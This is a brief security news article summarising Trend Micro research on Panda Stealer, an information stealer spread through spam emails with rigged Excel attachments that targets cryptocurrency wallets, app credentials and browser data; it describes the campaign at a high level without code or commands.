A new information stealer – Panda Stealer – delivered in rigged Excel files in a worldwide email spam campaign. Emails masquerade as business quotes and are aimed at stealing victims’ cryptocurrency and other info.
Trend Micro researchers said the recent spam campaign, first spotted the new stealer in April, has mostly targeted victims in Australia, Germany, Japan, and the U.S.
The fake emails lure victims into clicking on booby-trapped Excel files. The researchers say some of the files are shared by threat actors on Discord.
According to Cisco Talos cybersecurity team, collaboration tools like Slack and Discord are increasingly used to deliver info-stealers, remote-access Trojans (RATs), and other malware.
Once Panda gets installed, it tries to steal details such as private keys for cryptocurrency wallets and a history of past transactions. The targeted wallets include Bytecoin (BCN), Dash (DASH), Ethereum (ETH) and Litecoin (LTC). Beyond stealing wallets, it can also swindle credentials from various sensitive applications, such as NordVPN, Telegram, Discord, and Steam. Panda can take screenshots of the infected computer and filch browser cookies and passwords.
The researchers discovered in one scenario, spammers used an .XLSM attachment with macros that fetched a loader that installed the main stealer. In another scenario, an .XLS attachment contained an Excel formula that triggered two PowerShell commands that ultimately resulted in Panda installed and executed.
Researchers say Panda Stealer is a modified malware Collector Stealer, aka DC Stealer, advertised as a “top-end information stealer” and has a Russian interface.
NCP threat actor, aka su1c1de, has cracked Collector Stealer. Its version, Panda Stealer, behaves similarly, but uses different command-and-control (C2) URLs, build tags, and execution folders. Both exfiltrate information like cookies, passwords, and website data from a victim’s computer and stores it in an SQLite3 database.
The cracked Collector Stealer is readily available online for free:
“Cybercriminal groups and script kiddies alike can use it to create their own customized version of the stealer and C2 panel,” Trend Micro researchers said. “Threat actors may also augment their malware campaigns with specific features from Collector Stealer.”